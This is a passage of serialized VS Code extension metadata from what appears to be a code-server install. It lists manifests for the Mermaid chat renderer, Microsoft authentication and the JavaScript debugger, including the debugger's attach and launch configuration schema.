chats.","version":"1.0.0","publisher":"vscode","license":"MIT","repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"},"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.104.0"},"enabledApiProposals":["chatOutputRenderer"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"main":"./dist/extension","browser":"./dist/browser/extension","activationEvents":[],"contributes":{"configuration":{"title":"Mermaid Chat Features","properties":{"mermaid-chat.enabled":{"type":"boolean","default":false,"description":"Enable a tool for experimental Mermaid diagram rendering in chat responses.","scope":"application","tags":["experimental"]}}},"chatOutputRenderers":[{"viewType":"vscode.chatMermaidDiagram","mimeTypes":["text/vnd.mermaid"]}],"languageModelTools":[{"name":"renderMermaidDiagram","displayName":"Mermaid Renderer","toolReferenceName":"renderMermaidDiagram","canBeReferencedInPrompt":true,"modelDescription":"Renders a Mermaid diagram from Mermaid.js markup.","userDescription":"Render a Mermaid.js diagrams from markup.","when":"config.mermaid-chat.enabled","inputSchema":{"type":"object","properties":{"markup":{"type":"string","description":"The mermaid diagram markup to render as a Mermaid diagram. This should only be the markup of the diagram. Do not include a wrapping code block."}}}}]}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/mermaid-chat-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.microsoft-authentication"},"manifest":{"name":"microsoft-authentication","publisher":"vscode","license":"MIT","displayName":"Microsoft Account","description":"Microsoft authentication provider","version":"0.0.1","engines":{"vscode":"^1.42.0"},"icon":"media/icon.png","categories":["Other"],"activationEvents":[],"enabledApiProposals":["nativeWindowHandle","authIssuers","authenticationChallenges"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"extensionKind":["ui","workspace"],"contributes":{"authentication":[{"label":"Microsoft","id":"microsoft","authorizationServerGlobs":["https://login.microsoftonline.com/*","https://login.microsoftonline.com/*/v2.0"]},{"label":"Microsoft Sovereign Cloud","id":"microsoft-sovereign-cloud"}],"configuration":[{"title":"Microsoft Sovereign Cloud","properties":{"microsoft-sovereign-cloud.environment":{"type":"string","markdownDescription":"The Sovereign Cloud to use for authentication. If you select `custom`, you must also set the `#microsoft-sovereign-cloud.customEnvironment#` setting.","enum":["ChinaCloud","USGovernment","custom"],"enumDescriptions":["Azure China","Azure US Government","A custom Microsoft Sovereign Cloud"]},"microsoft-sovereign-cloud.customEnvironment":{"type":"object","additionalProperties":true,"markdownDescription":"The custom configuration for the Sovereign Cloud to use with the Microsoft Sovereign Cloud authentication provider. This along with setting `#microsoft-sovereign-cloud.environment#` to `custom` is required to use this feature.","properties":{"name":{"type":"string","description":"The name of the custom Sovereign Cloud."},"portalUrl":{"type":"string","description":"The portal URL for the custom Sovereign Cloud."},"managementEndpointUrl":{"type":"string","description":"The management endpoint for the custom Sovereign Cloud."},"resourceManagerEndpointUrl":{"type":"string","description":"The resource manager endpoint for the custom Sovereign Cloud."},"activeDirectoryEndpointUrl":{"type":"string","description":"The Active Directory endpoint for the custom Sovereign Cloud."},"activeDirectoryResourceId":{"type":"string","description":"The Active Directory resource ID for the custom Sovereign Cloud."}},"required":["name","portalUrl","managementEndpointUrl","resourceManagerEndpointUrl","activeDirectoryEndpointUrl","activeDirectoryResourceId"]}}},{"title":"Microsoft","properties":{"microsoft-authentication.implementation":{"type":"string","default":"msal","enum":["msal","msal-no-broker"],"enumDescriptions":["Use the Microsoft Authentication Library (MSAL) to sign in with a Microsoft account.","Use the Microsoft Authentication Library (MSAL) to sign in with a Microsoft account using a browser. This is useful if you are having issues with the native broker."],"markdownDescription":"The authentication implementation to use for signing in with a Microsoft account.","tags":["onExP"]}}}]},"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","main":"./dist/extension.js","repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/microsoft-authentication","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"ms-vscode.js-debug"},"manifest":{"name":"js-debug","displayName":"JavaScript Debugger","version":"1.105.0","publisher":"ms-vscode","author":{"name":"Microsoft Corporation"},"keywords":["pwa","javascript","node","chrome","debugger"],"description":"An extension for debugging Node.js programs and Chrome.","license":"MIT","engines":{"vscode":"^1.80.0","node":">=10"},"icon":"resources/logo.png","categories":["Debuggers"],"private":true,"repository":{"type":"git","url":"https://github.com/Microsoft/vscode-pwa.git"},"bugs":{"url":"https://github.com/Microsoft/vscode-pwa/issues"},"main":"./src/extension.js","enabledApiProposals":["portsAttributes","workspaceTrust","tunnels"],"extensionKind":["workspace"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":"limited","description":"Trust is required to debug code in this workspace."}},"activationEvents":["onDebugDynamicConfigurations","onDebugInitialConfigurations","onFileSystem:jsDebugNetworkFs","onDebugResolve:pwa-node","onDebugResolve:node-terminal","onDebugResolve:pwa-extensionHost","onDebugResolve:pwa-chrome","onDebugResolve:pwa-msedge","onDebugResolve:node","onDebugResolve:chrome","onDebugResolve:extensionHost","onDebugResolve:msedge","onCommand:extension.js-debug.clearAutoAttachVariables","onCommand:extension.js-debug.setAutoAttachVariables","onCommand:extension.js-debug.autoAttachToProcess","onCommand:extension.js-debug.pickNodeProcess","onCommand:extension.js-debug.requestCDPProxy","onCommand:extension.js-debug.completion.nodeTool"],"contributes":{"menus":{"commandPalette":[{"command":"extension.js-debug.prettyPrint","title":"Pretty print for debugging","when":"debugType == pwa-extensionHost && debugState == stopped || debugType == node-terminal && debugState == stopped || debugType == pwa-node && debugState == stopped || debugType == pwa-chrome && debugState == stopped || debugType == pwa-msedge && debugState == stopped"},{"command":"extension.js-debug.startProfile","title":"Take Performance Profile","when":"debugType == pwa-extensionHost && inDebugMode && !jsDebugIsProfiling || debugType == node-terminal && inDebugMode && !jsDebugIsProfiling || debugType == pwa-node && inDebugMode && !jsDebugIsProfiling || debugType == pwa-chrome && inDebugMode && !jsDebugIsProfiling || debugType == pwa-msedge && inDebugMode && !jsDebugIsProfiling"},{"command":"extension.js-debug.stopProfile","title":"Stop Performance Profile","when":"debugType == pwa-extensionHost && inDebugMode && jsDebugIsProfiling || debugType == node-terminal && inDebugMode && jsDebugIsProfiling || debugType == pwa-node && inDebugMode && jsDebugIsProfiling || debugType == pwa-chrome && inDebugMode && jsDebugIsProfiling || debugType == pwa-msedge && inDebugMode && jsDebugIsProfiling"},{"command":"extension.js-debug.revealPage","when":"false"},{"command":"extension.js-debug.debugLink","title":"Open Link","when":"!isWeb"},{"command":"extension.js-debug.createDiagnostics","title":"Diagnose Breakpoint Problems","when":"debugType == pwa-extensionHost && inDebugMode || debugType == node-terminal && inDebugMode || debugType == pwa-node && inDebugMode || debugType == pwa-chrome && inDebugMode || debugType == pwa-msedge && inDebugMode"},{"command":"extension.js-debug.getDiagnosticLogs","title":"Save Diagnostic JS Debug Logs","when":"debugType == pwa-extensionHost && inDebugMode || debugType == node-terminal && inDebugMode || debugType == pwa-node && inDebugMode || debugType == pwa-chrome && inDebugMode || debugType == pwa-msedge && inDebugMode"},{"command":"extension.js-debug.openEdgeDevTools","title":"Open Browser Devtools","when":"debugType == pwa-msedge"},{"command":"extension.js-debug.callers.add","title":"Exclude caller from pausing in the current location","when":"debugType == pwa-extensionHost && debugState == \"stopped\" || debugType == node-terminal && debugState == \"stopped\" || debugType == pwa-node && debugState == \"stopped\" || debugType == pwa-chrome && debugState == \"stopped\" || debugType == pwa-msedge && debugState == \"stopped\""},{"command":"extension.js-debug.callers.goToCaller","when":"false"},{"command":"extension.js-debug.callers.gotToTarget","when":"false"},{"command":"extension.js-debug.network.copyUri","when":"false"},{"command":"extension.js-debug.network.openBody","when":"false"},{"command":"extension.js-debug.network.openBodyInHex","when":"false"},{"command":"extension.js-debug.network.replayXHR","when":"false"},{"command":"extension.js-debug.network.viewRequest","when":"false"},{"command":"extension.js-debug.network.clear","when":"false"},{"command":"extension.js-debug.enableSourceMapStepping","when":"jsDebugIsMapSteppingDisabled"},{"command":"extension.js-debug.disableSourceMapStepping","when":"!jsDebugIsMapSteppingDisabled"}],"debug/callstack/context":[{"command":"extension.js-debug.revealPage","group":"navigation","when":"debugType == pwa-chrome && callStackItemType == 'session' || debugType == pwa-msedge && callStackItemType == 'session'"},{"command":"extension.js-debug.toggleSkippingFile","group":"navigation","when":"debugType == pwa-extensionHost && callStackItemType == 'session' || debugType == node-terminal && callStackItemType == 'session' || debugType == pwa-node && callStackItemType == 'session' || debugType == pwa-chrome && callStackItemType == 'session' || debugType == pwa-msedge && callStackItemType == 'session'"},{"command":"extension.js-debug.startProfile","group":"navigation","when":"debugType == pwa-extensionHost && !jsDebugIsProfiling && callStackItemType == 'session' || debugType == node-terminal && !jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-node && !jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-chrome && !jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-msedge && !jsDebugIsProfiling && callStackItemType == 'session'"},{"command":"extension.js-debug.stopProfile","group":"navigation","when":"debugType == pwa-extensionHost && jsDebugIsProfiling && callStackItemType == 'session' || debugType == node-terminal && jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-node && jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-chrome && jsDebugIsProfiling && callStackItemType == 'session' || debugType == pwa-msedge && jsDebugIsProfiling && callStackItemType == 'session'"},{"command":"extension.js-debug.startProfile","group":"inline","when":"debugType == pwa-extensionHost && !jsDebugIsProfiling || debugType == node-terminal && !jsDebugIsProfiling || debugType == pwa-node && !jsDebugIsProfiling || debugType == pwa-chrome && !jsDebugIsProfiling || debugType == pwa-msedge && !jsDebugIsProfiling"},{"command":"extension.js-debug.stopProfile","group":"inline","when":"debugType == pwa-extensionHost && jsDebugIsProfiling || debugType == node-terminal && jsDebugIsProfiling || debugType == pwa-node && jsDebugIsProfiling || debugType == pwa-chrome && jsDebugIsProfiling || debugType == pwa-msedge && jsDebugIsProfiling"},{"command":"extension.js-debug.callers.add","when":"debugType == pwa-extensionHost && callStackItemType == 'stackFrame' || debugType == node-terminal && callStackItemType == 'stackFrame' || debugType == pwa-node && callStackItemType == 'stackFrame' || debugType == pwa-chrome && callStackItemType == 'stackFrame' || debugType == pwa-msedge && callStackItemType == 'stackFrame'"}],"debug/toolBar":[{"command":"extension.js-debug.stopProfile","when":"debugType == pwa-extensionHost && jsDebugIsProfiling || debugType == node-terminal && jsDebugIsProfiling || debugType == pwa-node && jsDebugIsProfiling || debugType == pwa-chrome && jsDebugIsProfiling || debugType == pwa-msedge && jsDebugIsProfiling"},{"command":"extension.js-debug.openEdgeDevTools","when":"debugType == pwa-msedge"},{"command":"extension.js-debug.enableSourceMapStepping","when":"jsDebugIsMapSteppingDisabled"}],"view/title":[{"command":"extension.js-debug.addCustomBreakpoints","when":"view == jsBrowserBreakpoints","group":"navigation"},{"command":"extension.js-debug.removeAllCustomBreakpoints","when":"view == jsBrowserBreakpoints","group":"navigation"},{"command":"extension.js-debug.callers.removeAll","group":"navigation","when":"view == jsExcludedCallers"},{"command":"extension.js-debug.disableSourceMapStepping","group":"navigation","when":"debugType == pwa-extensionHost && view == workbench.debug.callStackView && !jsDebugIsMapSteppingDisabled || debugType == node-terminal && view == workbench.debug.callStackView && !jsDebugIsMapSteppingDisabled || debugType == pwa-node && view == workbench.debug.callStackView && !jsDebugIsMapSteppingDisabled || debugType == pwa-chrome && view == workbench.debug.callStackView && !jsDebugIsMapSteppingDisabled || debugType == pwa-msedge && view == workbench.debug.callStackView && !jsDebugIsMapSteppingDisabled"},{"command":"extension.js-debug.enableSourceMapStepping","group":"navigation","when":"debugType == pwa-extensionHost && view == workbench.debug.callStackView && jsDebugIsMapSteppingDisabled || debugType == node-terminal && view == workbench.debug.callStackView && jsDebugIsMapSteppingDisabled || debugType == pwa-node && view == workbench.debug.callStackView && jsDebugIsMapSteppingDisabled || debugType == pwa-chrome && view == workbench.debug.callStackView && jsDebugIsMapSteppingDisabled || debugType == pwa-msedge && view == workbench.debug.callStackView && jsDebugIsMapSteppingDisabled"},{"command":"extension.js-debug.network.clear","group":"navigation","when":"view == jsDebugNetworkTree"}],"view/item/context":[{"command":"extension.js-debug.addXHRBreakpoints","when":"view == jsBrowserBreakpoints && viewItem == xhrBreakpoint"},{"command":"extension.js-debug.editXHRBreakpoints","when":"view == jsBrowserBreakpoints && viewItem == xhrBreakpoint","group":"inline"},{"command":"extension.js-debug.editXHRBreakpoints","when":"view == jsBrowserBreakpoints && viewItem == xhrBreakpoint"},{"command":"extension.js-debug.removeXHRBreakpoint","when":"view == jsBrowserBreakpoints && viewItem == xhrBreakpoint","group":"inline"},{"command":"extension.js-debug.removeXHRBreakpoint","when":"view == jsBrowserBreakpoints && viewItem == xhrBreakpoint"},{"command":"extension.js-debug.addXHRBreakpoints","when":"view == jsBrowserBreakpoints && viewItem == xhrCategory","group":"inline"},{"command":"extension.js-debug.callers.goToCaller","group":"inline","when":"view == jsExcludedCallers"},{"command":"extension.js-debug.callers.gotToTarget","group":"inline","when":"view == jsExcludedCallers"},{"command":"extension.js-debug.callers.remove","group":"inline","when":"view == jsExcludedCallers"},{"command":"extension.js-debug.network.viewRequest","group":"inline@1","when":"view == jsDebugNetworkTree"},{"command":"extension.js-debug.network.openBody","group":"body@1","when":"view == jsDebugNetworkTree"},{"command":"extension.js-debug.network.openBodyInHex","group":"body@2","when":"view == jsDebugNetworkTree"},{"command":"extension.js-debug.network.copyUri","group":"other@1","when":"view == jsDebugNetworkTree"},{"command":"extension.js-debug.network.replayXHR","group":"other@2","when":"view == jsDebugNetworkTree"}],"editor/title":[{"command":"extension.js-debug.prettyPrint","group":"navigation","when":"jsDebugCanPrettyPrint"}]},"breakpoints":[{"language":"javascript"},{"language":"typescript"},{"language":"typescriptreact"},{"language":"javascriptreact"},{"language":"fsharp"},{"language":"html"},{"language":"wat"},{"language":"c"},{"language":"cpp"},{"language":"rust"},{"language":"zig"}],"debuggers":[{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"TCP/IP address of process to be debugged. Default is 'localhost'.","type":"string"},"attachExistingChildren":{"default":false,"description":"Whether to attempt to attach to already-spawned child processes.","type":"boolean"},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"continueOnAttach":{"default":true,"markdownDescription":"If true, we'll automatically resume programs launched and waiting on `--inspect-brk`","type":"boolean"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"port":{"default":9229,"description":"Debug port to attach to. Default is 9229.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"processId":{"default":"${command:PickProcess}","description":"ID of process to attach to.","type":"string"},"remoteHostHeader":{"description":"Explicit Host header to use when connecting to the websocket of inspector. If unspecified, the host header will be set to 'localhost'. This is useful when the inspector is running behind a proxy that only accept particular Host header.","type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"websocketAddress":{"description":"Exact websocket address to attach to. If unspecified, it will be discovered from the address and port.","type":"string"}}},"launch":{"properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}}}},"configurationSnippets":[],"deprecated":"Please use type node instead","label":"Node.js","languages":["javascript","typescript","javascriptreact","typescriptreact"],"strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch 